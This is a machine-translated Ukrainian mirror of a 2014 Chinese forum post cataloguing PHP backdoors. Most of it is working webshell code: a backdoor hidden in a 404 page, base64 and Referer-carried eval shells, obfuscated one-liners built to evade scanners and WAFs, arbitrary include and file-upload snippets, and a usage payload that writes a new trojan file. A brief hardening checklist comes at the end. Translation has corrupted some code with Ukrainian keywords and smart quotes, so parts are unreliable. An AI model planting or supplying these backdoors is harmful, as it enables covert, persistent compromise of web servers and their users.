Ця стаття є дзеркальною статтею машинного перекладу, будь ласка, натисніть тут, щоб перейти до оригінальної статті.

Вид: 7260|Відповідь: 0

[Безпечне спілкування] Розібратися з тими потужними PHP-бекдорами

[Копіювати посилання]
Опубліковано 01.12.2014 21:41:13 | | |
Ми ставимося до цих PHP-бекдорів із менталітетом навчання, і багато PHP-бекдор-коду дозволяє нам бачити, наскільки добре намірлені програмісти.
Потужний PHP-бекдор в одному реченні
Такий бекдор дозволяє вебсайтам,Адміністратори серверів дуже складні і часто змушені змінювати методи для виконання різних виявлень, а багато нових методів написання не можна виявити та опрацювати звичайними методами виявлення.
Сьогодні ми розрахуємо кілька цікавих PHP-троянів.
1. Приховати PHP-поні, використовуючи 404 сторінки:
[mw_shl_code=php, true] <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Не знайдено</title>
</head><body>
<h1>Не знайдено</h1>
<p>Запитувана URL не була знайдена на цьому сервері.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>[/mw_shl_code]
Сторінка 404 — це поширений файл на сайті, і мало хто перевірить і змінить його після того, як це зазвичай рекомендується, тож ми можемо використовувати це, щоб приховати бекдор.

2. Безликий прихований PHP в одному реченні:
[mw_shl_code=php,true]<?php
session_start();
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a');
?>[/mw_shl_code]
Призначте $_POST['code'] $_SESSION['theCode'], а потім виконайте $_SESSION['theCode'], при цьому виділено відсутність коду підпису.
Якщо ви використовуєте інструмент сканування для перевірки коду, він не спрацює і досягне мети.

3. Супер прихований PHP-бекдор:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
Функція GET сама по собі є трояном;
Як користуватися:
[mw_shl_code=php, true]        
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Після виконання поточний каталог генерує c.php речення Trojan, коли параметр A оцінюється, генерація помилки Trojan не вдалася, і при затвердженні він також повідомляє про помилку, але генерує троянського коня, який не можна недооцінювати.
Запит рівня, код для запуску PHP backdoor:
Цей метод реалізовано з двома файлами, файлом 1
[mw_shl_code=php,true]<?php
//1.php
header('Content-type:text/html; charset=UTF-8′);
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10'&& count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
?>[/mw_shl_code]
Документ 2
[mw_shl_code=php,true]<?php
//2.php
header('Content-type:text/html; charset=UTF-8′);
//要执行的代码
$code= <<<КОД
phpinfo();
CODE;
//进行base64编码
$code= base64_encode($code);
//构造referer字符串
$referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url= 'http://localhost/test1/1.php';
$ch= curl_init();
$options= масив(
CURLOPT_URL => $url,
CURLOPT_HEADER => ХИБНО,
CURLOPT_RETURNTRANSFER => ПРАВДА,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echocurl_exec($ch);
?>[/mw_shl_code]
Запустіть код, закодований base64, через HTTP_REFERER у HTTP-запиті, щоб досягти ефекту бекдора.
Добре використовувати цю ідею, щоб обійти WAF.
4.PHP інструмент для генератора бекдорів Weevely
weevely — це спеціалізований для PHPБезкоштовне програмне забезпечення Webshell може використовуватися для імітації оболонки з'єднання, подібного до telnet. Weevely зазвичай використовується для експлуатації веб-програм, приховування бекдорів або використання методів, схожих на telnet замість керування веб-сторінками, серверний PHP-код, створений Weevely, кодується на base64, тому може обманювати основне антивірусне програмне забезпечення та IDS, Після завантаження серверного коду зазвичай можна запустити його безпосередньо через Weevely.
Функції, що використовуються в бекдорі, часто використовуються для обробки рядків, і такі функції, як eval і system, які використовуються як правила інспекції, не з'являються безпосередньо в коді, тому файл бекдора може обійти перевірку інструменту пошуку бекдора. Сканування за допомогою інструменту для виявлення бекдорів темної групи показує, що файл не загрожує жодній загрозі.
Вищенаведене — це загальне вступ, і відповідні методи використання тут не представлені, це проста популяризація науки.
4. Три деформовані однореченні PHP-трояни
      Перший:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
Друга
[mw_shl_code=php,true]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ ”). ($_[+“”]|“”). ($_[+“”]^“”);
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Напишіть http://site/2.php?_=assert&__=eval($_POST['pass']) пароль у кухонному ножі — це pass.
Якщо використовувати додаткові дані кухонного ножа, вони більш приховані, або можна використовувати інші інструменти для ін'єкцій, бо вони подані після публікації.
Третій
[mw_shl_code=php, true] ($b 4dboy= $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'додати'); [/mw_shl_code]
str_rot13 ('riny') — це закодована оцінка, яка повністю уникає ключових слів, не втрачаючи ефекту, змушуючи людей блювати кров'ю!
5. Нарешті, перелічіть кілька просунутих PHP-троянських бекдорів:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid'];
include($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”;
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= «p». r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Підсумовуючи, ці PHP-бекдори можна назвати завершеними, якщо ви не будете обережні, вас обов'язково обдурять, і який пріоритет нашої статті сьогодні? Ключові моменти наведені в підсумку нижче!
Як впоратися з однореченим бекдором PHP:
Ми підкреслюємо кілька ключових моментів, і якщо ви читаєте цю статтю, я вважаю, що ви не непрофесіонал, тому не буду довго говорити:
  • Будьте обережні з безпекою при написанні програм на PHP
  • Файли логів сервера слід часто читати та регулярно робити резервні копії
  • Суворе призначення дозволів для кожного об'єкта
  • Часті пакетні перевірки безпеки динамічних файлів і каталогів
  • Дізнайтеся, як проводити ручне дослідження антивірусу «Розслідування поведінкового судження та вбивство»
  • Слідкуйте за оновленнями або проникайте в активний табір кібербезпеки
  • Навіть функцію можна використовувати як правило для ієрархічної обробки серверного середовища
Ми вважаємо, що коли з'являється більше сайтів для управління і велика кількість даних, слід розумно застосовувати допоміжні інструменти, але не варто повністю покладатися на них, технології постійно оновлюються і вдосконалюються, найважливіше — щоб ви навчилися і розуміли ідею написання цих потужних бекдорів, і ця трансформація ролі може принести вам більший прогрес.





Попередній:Плагіни Firefox Плагін для зламу Firefox перетворює Firefox на інструмент для злому з сімома плагінами
Наступний:MS12-020 3389 0day exp Віддалений робочий стіл Код виконання Python вихідний код
Застереження:
Усе програмне забезпечення, програмні матеріали або статті, опубліковані Code Farmer Network, призначені лише для навчання та досліджень; Вищезазначений контент не повинен використовуватися в комерційних чи незаконних цілях, інакше користувачі несуть усі наслідки. Інформація на цьому сайті надходить з Інтернету, і спори щодо авторських прав не мають до цього сайту. Ви повинні повністю видалити вищезазначений контент зі свого комп'ютера протягом 24 годин після завантаження. Якщо вам подобається програма, будь ласка, підтримуйте справжнє програмне забезпечення, купуйте реєстрацію та отримайте кращі справжні послуги. Якщо є будь-яке порушення, будь ласка, зв'яжіться з нами електронною поштою.

Mail To:help@itsvse.com